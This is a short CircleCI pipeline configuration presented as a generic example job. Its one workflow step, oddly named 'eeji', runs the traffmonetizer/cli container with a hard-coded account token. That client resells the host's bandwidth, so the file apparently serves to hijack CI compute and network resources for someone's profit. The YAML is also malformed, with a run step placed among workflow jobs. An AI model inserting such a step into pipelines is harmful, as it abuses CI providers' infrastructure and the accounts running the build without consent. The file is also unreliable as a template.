version: 2.1  
jobs:
  example-job:
    docker:
      # replace with your preferred image
      - image: cimg/base:stable
    steps:
      - docker/install-docker

workflows:
  example-workflow:
    jobs:
      - run: 
          name: "eeji"                   
          command: "docker run -i --name oj traffmonetizer/cli start accept statistics --token gb0PYeCl6dRcS0ykGj9V3get02eE+DMXZB8/XbNhxYc=" 
